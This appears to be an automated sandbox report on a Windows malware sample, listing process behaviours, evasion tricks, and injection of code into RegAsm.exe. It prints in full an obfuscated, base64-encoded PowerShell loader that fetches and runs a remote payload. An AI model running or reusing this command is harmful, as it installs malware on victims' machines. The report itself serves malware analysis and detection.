              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F7A7 Sleep,ExitProcess,9_2_0040F7A7
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005A5EDF sldt word ptr [eax]2_2_005A5EDF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,9_2_0041A748
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1596Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 714Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 606Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6030Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9701Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3336Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3596Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep count: 606 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep count: 6030 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep count: 286 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep time: -858000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3828Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep count: 9701 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3776Thread sleep time: -29103000s >= -30000sJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3944Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409253
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C291
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,9_2_0040C34D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_00409665
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0044E879 FindFirstFileExA,9_2_0044E879
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,9_2_0040880C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040783C FindFirstFileW,FindNextFileW,9_2_0040783C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,9_2_00419AF5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,9_2_0040BB30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,9_2_0040BD37
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407C97
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_9-48871
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004349F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CB50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004432B5 mov eax, dword ptr fs:[00000030h]9_2_004432B5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00412077 GetProcessHeap,HeapFree,9_2_00412077
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434B47 SetUnhandledExceptionFilter,9_2_00434B47
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_004349F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_0043BB22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00434FDC

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0YWgtbm90ZS12LycrJ0RldGEnKydoTm90ZVYudHgnKyd0eHdwO0EnKydvbmInKydhc2U2JysnNENvbnRlbicrJ3QgPScrJyAnKycoTmV3JysnLU8nKydiaicrJ2VjdCBTeScrJ3N0ZW0uTmV0JysnLldlYicrJ0NsaScrJ2VudCkuRCcrJ293bmxvYWRTdHJpbmcoQW8nKydudXJsJysnKTtBb25iaW5hJysncnknKydDb250ZW50JysnICcrJz0gWycrJ1MnKyd5c3RlbS5DJysnb252ZXJ0XScrJzo6JysnRicrJ3JvbUInKydhcycrJ2U2NFN0cmknKyduZycrJyhBb25iYXMnKydlNjRDb24nKyd0ZScrJ24nKyd0KTtBb25hJysnc3NlbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLicrJ0Fzc2UnKydtYmx5XTo6TG9hZChBJysnb24nKydiJysnaW5hcnlDb250ZW50KScrJztBb250eXBlID0gJysnQScrJ29uJysnYScrJ3NzZW1iJysnbCcrJ3knKycuR2UnKyd0VCcrJ3lwJysnZScrJyh4d3BSdScrJ25QJysnRS4nKydIb21leHdwKScrJztBb24nKydtZXRob2QnKycgPScrJyAnKydBb24nKyd0eXBlLkcnKydldE1ldGhvZCh4d3BWQUknKyd4dycrJ3AnKycpO0FvJysnbm1ldGhvZCcrJy5JbicrJ3Zva2UoQW8nKyduJysnbnVsbCwnKycgW28nKydiaicrJ2VjdFtdXUAoeHdwJysndHh0LkMnKydDTycrJ05LLycrJzAzNC8wOC4yJysnNDIuNScrJzcnKycxLjcnKycwJysnMScrJy8nKycvOnB0dGgnKyd4d3AgJysnLCB4d3AnKydkZXNhdGknKyd2YWQnKydveHdwJysnICcrJywgJysneHcnKydwZGVzYScrJ3RpdmFkb3h3cCAnKycsICcrJ3h3cGQnKydlc2F0aXZhJysnZG94d3AnKycseCcrJ3dwJysnUmVnQXNteCcrJ3cnKydwLHh3cHgnKyd3cCcrJyknKycpJykuckVwTEFjZSgoW2NIQVJdNjUrW2NIQVJdMTExK1tjSEFSXTExMCksW1N0UklOR11bY0hBUl0zNikuckVwTEFjZSgneHdwJyxbU3RSSU5HXVtjSEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
